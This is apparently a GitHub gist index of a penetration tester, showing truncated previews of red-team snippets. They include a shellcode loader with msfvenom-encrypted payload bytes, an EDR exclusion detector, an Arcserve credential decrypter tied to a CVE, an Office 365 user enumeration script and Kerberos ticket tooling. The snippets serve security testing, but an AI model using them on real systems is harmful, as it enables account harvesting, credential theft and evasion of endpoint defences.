@dadevel
dadevel / Dockerfile
Last active February 18, 2024 14:46
Neo4j container with APOC and GDS
# usage: docker build -t ghcr.io/dadevel/neo4j:4.4.12 . && docker run -d --name neo4j -p 127.0.0.1:7474:7474 -p 127.0.0.1:7687:7687 -e NEO4J_AUTH=none ghcr.io/dadevel/neo4j:4.4.12
FROM docker.io/library/neo4j:4.4.12
# apoc version from https://neo4j-contrib.github.io/neo4j-apoc-procedures/versions.json
RUN wget -qO /var/lib/neo4j/plugins/apoc.jar https://github.com/neo4j-contrib/neo4j-apoc-procedures/releases/download/4.4.0.11/apoc-4.4.0.11-all.jar
# gds version from https://graphdatascience.ninja/versions.json
RUN wget -qO /var/lib/neo4j/plugins/gds.jar https://graphdatascience.ninja/neo4j-graph-data-science-2.2.3.jar
RUN echo 'dbms.security.procedures.unrestricted=apoc.*,gds.*' >> /var/lib/neo4j/conf/neo4j.conf && \
    echo 'dbms.security.procedures.allowlist=apoc.*,gds.*' >> /var/lib/neo4j/conf/neo4j.conf
@dadevel
dadevel / style.css
Created February 14, 2024 19:45
Protective Branding for M365
/* Open https://portal.azure.com, select Entra ID > Company branding > Default sign-in > Edit > Layout > Custom CSS and upload this file */
.ext-sign-in-box {
    background-image: url("https://protective-branding.cloudgate.workers.dev/background.svg");
}
@dadevel
dadevel / byorwx.cpp
Last active December 4, 2023 20:57
Bring your own RWX section
#include <cstdint>
// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe
// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef
unsigned char buf[] =
"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32"
"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36"
"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c"
"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23"
@dadevel
dadevel / README.md
Last active March 19, 2024 13:18
Proxychains Quick Config
@dadevel
dadevel / CheckDLLs.ps1
Last active November 8, 2023 12:24
EDR Exclusion Detector
# based on https://gist.github.com/S3cur3Th1sSh1t/d9aad93027aad893adae8805d59e2d73
# Get-Process | Get-LoadedModules -ModuleNames 'InProcessClient.dll','InProcessClient64.dll','MinProcessClient.dll','MinProcessClient64.dll' | ?{!$_.'InProcessClient.dll' -and !$_.'InProcessClient64.dll'} | ft -auto
function Get-LoadedModules {
param(
[Parameter(Mandatory,ValueFromPipeline)]
[System.Diagnostics.Process]
$Processes,
[Parameter(Mandatory)]
[string[]]
@dadevel
dadevel / ArcserveDecrypter.cpp
Last active August 31, 2023 20:30
ArcserveDecrypter
#include <windows.h>
#include <stdio.h>
// compilation: x86_64-w64-mingw32-g++ -m64 -Wall -Wextra -std=c++20 -lstdc++ -static -Os -s -o ./ArcserveDecrypter.exe ./ArcserveDecrypter.cpp
// usage: ./ArcserveDecrypter.exe HEXBLOB
// based on https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe/blob/main/ArcServeDecrypter.c
constexpr unsigned char key[] = { 0x50, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x61, 0x00, 0x73, 0x00, 0x65, 0x00, 0x20, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x70, 0x00, 0x75, 0x00, 0x74, 0x00, 0x20, 0x00, 0x61, 0x00, 0x20, 0x00, 0x76, 0x00, 0x61, 0x00, 0x6C, 0x00, 0x69, 0x00, 0x64, 0x00, 0x20, 0x00, 0x70, 0x00, 0x61, 0x00, 0x73, 0x00, 0x73, 0x00, 0x77, 0x00, 0x6F, 0x00, 0x72, 0x00, 0x64, 0x00 };
constexpr auto key_len = sizeof(key);
@dadevel
dadevel / azmail.py
Last active February 28, 2023 13:35
Send Email with Azure/M365
#!/usr/bin/env python3
from argparse import ArgumentParser
import json
import sys
import requests
# Retrieve an access token via the device code flow:
# roadtx auth --tokenfile ~/.cache/azmail.json --resource https://outlook.office.com --client d3590ed6-52b3-4102-aeff-aad2292ab01c --tenant contoso.com --device-code
@dadevel
dadevel / o365-user-enum.py
Created February 22, 2023 11:10
O365 User Enumeration
#!/usr/bin/python3
import requests
import sys
# usage: cat ./gathered-emails.txt | ./o365-user-enum.py | tee -a ./valid-emails.txt
url = 'https://login.microsoftonline.com/common/GetCredentialType'
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5359.178 Safari/537.36 Edg/106.0.1266.51'
with requests.session() as session:
@dadevel
dadevel / ldeep-trust-discover.sh
Last active January 27, 2023 22:43
AD Trust Discovery with franc-pentest/ldeep#27
#!/usr/bin/env bash
set -euo pipefail
# usage: ldeep-trust-discover child.corp.com -u user -p passw0rd
discover() {
if [[ ! -e "./trust-$1.json" ]]; then
echo "discovering $1" >&2
ldeep ldap -s ldaps://"$1" "${@:2}" trusts -v > "./trust-$1.json" 2> /dev/null || \
ldeep ldap -s ldap://"$1" "${@:2}" trusts -v > "./trust-$1.json" 2> /dev/null || {
@dadevel
dadevel / impacket-ccache-helper.py
Last active July 15, 2023 14:02
Impacket Ticket Helper
#!/usr/bin/env python3
from argparse import ArgumentParser, Namespace
import base64
import hashlib
import itertools
import os
import shlex
import sys
from impacket.krb5.ccache import CCache